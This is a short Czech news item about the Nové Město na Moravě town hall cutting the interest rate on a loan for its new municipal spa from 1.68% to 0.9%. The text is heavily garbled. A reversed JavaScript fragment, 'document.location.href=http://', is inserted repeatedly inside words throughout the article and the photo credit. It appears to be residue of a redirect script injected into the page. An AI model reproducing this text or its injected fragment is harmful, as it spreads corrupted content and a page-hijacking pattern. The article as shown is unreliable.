Rainbow page separator

Novoměstská radnice ušetří při splácení úvěru za lázně

Pondělí, 20. dubna 2015

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Více než milion korun by měla novoměstská radnice ušetřit při splácení v souvislosti s vyjednáním nižšího úroku u úvěru, který bude využit při financování právě budovaných městských lázní. Mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to 1,68 procenta bude úrok jenom 0,9 procenta, což činí jeho snížení o 0,78 procenta.
Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že se úroková sazba od doby vysoutěžení současného úvěru na trhu značně snížila, nebyla už tak výhodná, a novoměstská radnice navíc dostala obdobnou nabídku úvěru od konkurenční banky za úrokovou sazbu 0,9 procenta. S tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pak mohla operovat při dalším jednání se stávajícím posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelem úvěru, přičemž v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jednání uspěla.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com